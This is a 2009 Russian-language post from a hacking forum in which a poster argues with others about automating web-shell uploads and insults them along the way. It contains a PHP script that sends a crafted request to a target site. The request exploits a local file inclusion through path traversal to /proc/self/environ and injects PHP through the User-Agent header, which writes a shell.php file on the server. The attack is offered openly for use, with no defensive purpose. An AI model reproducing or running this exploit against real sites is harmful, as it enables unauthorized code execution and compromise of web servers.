14.12.2009, 20:07
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
С нами:
8653381
Репутация:
-55
|
|
Сообщение от Pashkela
большего бреда в жизни не читал.
Да ладно??!!
Сообщение от Pashkela
Автоматизация залития шелла - это сильно (в случае брута путей). Нереально сильно. Вот сам лентяй, но чтобы "шелл ручками было западло залить" - не, ну это шедеврально. Кроме того, что просто глупо.
Я имею автоматизацию залития в /proc/self/environ
а не в др. логи. это вполне выполнимо легко. скрипт кодил 1 минуту на пыхе. там тупо код в юзер агент выставляеться. надо сделать так: если /proc/self/environ существует, то прога залвает шелл через него.
PHP код:
<?php
$host = "www.ыапывпывпывп.org";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),"<?php phpinfo(); ?>");?>\r\n';
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen("<?php phpinfo(); ?>")."\r\n";
$head .= "\r\n<?php phpinfo(); ?>\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
Сообщение от slesh
Ты жжош. вариант залива шела через него невелик.
ну ты мега-кодер просто не знаеш что такое /proc/self/environ. ты же встётаки масдайщег-кодер 
если на сайте инлудиться это файлег, то 100% шелл.
Сообщение от slesh
И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков
Бред. Ачат вроде как хек прожект. А те, кто кроме пыха и подстоновки кавычек нихуя больше не умеют, те не хеккеры. Кстати я бы в РОА не брал тех кто не умеют на сях кодить
Последний раз редактировалось Matnya; 14.12.2009 в 20:13..
|
|
|